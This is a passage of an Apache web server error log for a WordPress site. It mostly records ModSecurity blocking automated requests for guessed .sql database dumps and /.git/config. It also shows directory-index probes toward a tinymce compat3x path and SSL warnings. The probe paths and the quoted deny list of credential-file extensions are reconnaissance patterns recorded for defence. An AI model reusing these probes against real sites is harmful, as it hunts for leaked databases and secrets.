25052:tid 140324911384320] [client 58.96.51.251:60732] [client 58.96.51.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/1234567.sql"] [unique_id "ZRCqHYV7ImWRwMERyHjDSwAAANA"] [Sun Sep 24 21:01:11.726966 2023] [:error] [pid 25052:tid 140324995311360] [client 73.139.112.147:36066] [client 73.139.112.147] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dragon.sql"] [unique_id "ZRDp54V7ImWRwMERyHjFHQAAAMY"] [Mon Sep 25 01:27:31.228023 2023] [:error] [pid 25052:tid 140324894598912] [client 14.48.28.154:40928] [client 14.48.28.154] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/123123.sql"] [unique_id "ZREoU4V7ImWRwMERyHjHcgAAANI"] [Mon Sep 25 03:08:17.918938 2023] [ssl:warn] [pid 31928:tid 140582537152384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 25 03:08:22.124862 2023] [ssl:warn] [pid 31936:tid 140582537152384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 25 03:08:22.495363 2023] [ssl:warn] [pid 31936:tid 140582537152384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 25 03:08:24.180202 2023] [ssl:warn] [pid 31936:tid 140582537152384] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 25 03:08:26.497537 2023] [ssl:warn] [pid 32350:tid 139897367390080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 25 03:08:32.661130 2023] [ssl:warn] [pid 32351:tid 139897367390080] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 25 06:04:09.995417 2023] [:error] [pid 1554:tid 139897075656448] [client 94.134.74.206:44940] [client 94.134.74.206] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/baseball.sql"] [unique_id "ZRFpKcy3XzU86BUKcZIg3AAAAMQ"] [Mon Sep 25 06:54:29.589441 2023] [autoindex:error] [pid 32370:tid 139897176254208] [client 51.222.158.14:45440] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 25 10:34:05.655942 2023] [autoindex:error] [pid 1554:tid 139897016907520] [client 103.101.203.114:48824] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 25 10:34:09.026354 2023] [autoindex:error] [pid 1554:tid 139897042085632] [client 103.101.203.114:48834] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 25 10:34:10.507505 2023] [autoindex:error] [pid 32373:tid 139896924587776] [client 103.101.203.114:48840] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 25 10:34:14.686428 2023] [autoindex:error] [pid 1554:tid 139897033692928] [client 103.101.203.114:48856] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 25 10:34:17.319569 2023] [autoindex:error] [pid 32369:tid 139897184646912] [client 103.101.203.114:48870] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 25 10:34:18.004261 2023] [autoindex:error] [pid 32370:tid 139896924587776] [client 103.101.203.114:48874] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 25 10:44:55.327846 2023] [:error] [pid 32373:tid 139896983336704] [client 14.48.28.154:49398] [client 14.48.28.154] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/abc123.sql"] [unique_id "ZRGq9w9c8C4Kj58F5y3pAQAAAI8"] [Mon Sep 25 15:21:36.170441 2023] [:error] [pid 1554:tid 139897050478336] [client 208.102.168.75:55048] [client 208.102.168.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/football.sql"] [unique_id "ZRHr0My3XzU86BUKcZIkYQAAAMc"] 2023/09/25 16:18:45 [error] 32235#32235: *130101 access forbidden by rule, client: 86.109.3.183, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Sep 25 19:57:56.846830 2023] [:error] [pid 1554:tid 139896924587776] [client 94.134.74.206:60232] [client 94.134.74.206] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/monkey.sql"] [unique_id "ZRIslMy3XzU86BUKcZIm2QAAANY"] [Tue Sep 26 00:35:46.837569 2023] [:error] [pid 32373:tid 139896991729408] [client 173.52.121.16:35738] [client 173.52.121.16] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/letmein.sql"] [unique_id "ZRJtsg9c8C4Kj58F5y3sUQAAAI4"] [Tue Sep 26 03:39:22.878490 2023] [ssl:warn] [pid 13143:tid 140038195656576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 26 03:39:27.036417 2023] [ssl:warn] [pid 13144:tid 140038195656576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 26 03:39:27.534595 2023] [ssl:warn] [pid 13144:tid 140038195656576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 26 03:39:29.212005 2023] [ssl:warn] [pid 13144:tid 140038195656576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 26 03:39:31.615882 2023] [ssl:warn] [pid 13563:tid 140094295156608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 26 03:39:37.795441 2023] [ssl:warn] [pid 13564:tid 140094295156608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 26 03:39:38.508483 2023] [ssl:warn] [pid 13564:tid 140094295156608] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 26 05:21:06.846414 2023] [:error] [pid 13717:tid 140093973063424] [client 173.52.121.16:40992] [client 173.52.121.16] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/696969.sql"] [unique_id "ZRKwkqDmVvTUKNtHkdhZXQAAAIg"] [Tue Sep 26 10:15:45.498698 2023] [:error] [pid 14354:tid 140093939492608] [client 58.96.51.251:46754] [client 58.96.51.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/shadow.sql"] [unique_id "ZRL1oa6OD1TknT-rb1sIKwAAAMw"] [Tue Sep 26 15:10:04.210624 2023] [:error] [pid 14354:tid 140093931099904] [client 185.162.16.58:53908] [client 185.162.16.58] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/master.sql"] [unique_id "ZRM6nK6OD1TknT-rb1sJzAAAAM0"] [Tue Sep 26 19:49:15.732216 2023] [autoindex:error] [pid 24125:tid 140094070449920] [client 179.188.11.53:59570] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Tue Sep 26 19:49:38.894863 2023] [autoindex:error] [pid 24125:tid 140093863958272] [client 179.188.11.53:59576] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Tue Sep 26 19:49:42.079954 2023] [autoindex:error] [pid 13717:tid 140093947885312] [client 179.188.11.53:59580] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Tue Sep 26 20:02:57.689024 2023] [:error] [pid 13715:tid 140093872350976] [client 203.210.232.66:59826] [client 203.210.232.66] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/666666.sql"] [unique_id "ZRN_QRLpqbmrhkUXOH_erAAAABQ"] [Wed Sep 27 00:53:33.393760 2023] [:error] [pid 24125:tid 140093956278016] [client 208.102.168.75:35680] [client 208.102.168.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/qwertyuiop.sql"] [unique_id "ZRPDXUz7U4AQdhlAVIIO4gAAAQo"] [Wed Sep 27 03:31:20.699562 2023] [ssl:warn] [pid 26045:tid 140503801444224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 27 03:31:26.869442 2023] [ssl:warn] [pid 26047:tid 140503801444224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 27 03:31:27.251860 2023] [ssl:warn] [pid 26047:tid 140503801444224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 27 03:31:28.993518 2023] [ssl:warn] [pid 26047:tid 140503801444224] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 27 03:31:31.282329 2023] [ssl:warn] [pid 26462:tid 139941766047616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 27 03:31:37.462636 2023] [ssl:warn] [pid 26463:tid 139941766047616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 27 05:51:47.328649 2023] [:error] [pid 26480:tid 139941434582784] [client 58.96.51.251:39804] [client 58.96.51.251] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/123321.sql"] [unique_id "ZRQJQ8EnognafEpucaM9egAAAAk"] [Wed Sep 27 10:48:04.655073 2023] [:error] [pid 26481:tid 139941409404672] [client 94.134.74.206:44436] [client 94.134.74.206] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/mustang.sql"] [unique_id "ZRROtJoT-4QP7Vwf1s7lYAAAAEw"] [Wed Sep 27 13:24:16.866342 2023] [autoindex:error] [pid 26482:tid 139941493331712] [client 192.185.81.131:47768] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Wed Sep 27 15:42:15.045926 2023] [:error] [pid 26480:tid 139941434582784] [client 182.215.164.33:50164] [client 182.215.164.33] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file 